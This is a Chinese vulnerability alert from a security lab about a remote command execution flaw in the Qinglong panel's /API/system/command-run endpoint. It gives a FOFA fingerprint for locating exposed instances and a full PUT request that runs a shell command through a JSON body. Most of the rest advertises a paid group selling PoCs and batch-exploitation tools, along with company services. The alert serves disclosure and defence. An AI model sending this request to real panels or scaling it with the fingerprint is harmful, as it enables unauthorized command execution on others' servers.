文章总结： 文档预警青龙面板存在远程代码执行漏洞，位于/API/system/command-run接口，攻击者可利用PUT请求执行任意命令。文中给出了FOFA指纹及具体POC请求包示例，复现过程简单。文章后半部分重点在于推销付费知识星球、POC工具及公司安全服务，商业推广意图明显，技术分析深度较浅，属于带有广告性质的漏洞预警文章。 综合评分： 55 文章分类： 漏洞预警,漏洞POC,软文广告,应用安全

【漏洞预警】青龙面板 网站管理系统 command-run 远程代码执行漏洞

by 融云安全-sm by 融云安全-sm

融云攻防实验室

2026年3月4日 11:11 江西

0x01 阅读须知

融云安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！

0x02 漏洞描述

青龙面板是一款基于Web的自动化任务管理与网站资源管理工具，旨在帮助用户高效处理各类定时任务、脚本执行与网站运维工作。‌

0x03 漏洞复现

fofa：icon_hash==”-254502902″

1.上传无害文件访问得到结果

PUT /API/system/command-run HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Content-Length: 17Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Connection: closeContent-Type: application/jsonDnt: 1Upgrade-Insecure-Requests: 1
{"command": "id"}

2.渝融云NTM入侵检测系统已支持青龙面板攻击检测（入侵检测合作可私聊公众号）

3.nuclei图形化检测工具和poc已公布在星球

最后给兄弟们推荐下圈子，高质量漏洞利用研究，代码审计圈子，每周至少更新三个0Day/Nday及对应漏洞的批量利用工具，团队内部POC，源码分享，星球不定时更新内外网攻防渗透技巧以及最新学习，SRC研究报告等。

【圈子权益】

1，一年至少200+漏洞Poc及对应漏洞批量利用工具

2，各种漏洞利用工具及后续更新，渗透工具、文档资源分享

3，内部漏洞库情报分享（目前已有1000+poc，会每日更新，包括部分未公开0/1day）

圈子目前价格为59元，现在星球有1000+位师傅相信并选择加入我们

0x05 公司简介

江西渝融云安全科技有限公司，2017年发展至今，已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司，是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证，拥有软件著作权十八项；荣获2020年全国工控安全深度行安全攻防对抗赛三等奖；庆祝建党100周年活动信息安全应急保障优秀案例等荣誉……

广告：CNNVD二级和三级申请、续期私聊找我对话，价格便宜童叟无欺！

编制：sm

审核：fjh

审核：Dog

1个1朵5毛钱

天天搬砖的小M

能不能吃顿好的

就看你们的啦

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：融云攻防实验室 by 融云安全-sm by 融云安全-sm《【漏洞预警】青龙面板 网站管理系统 command-run 远程代码执行漏洞》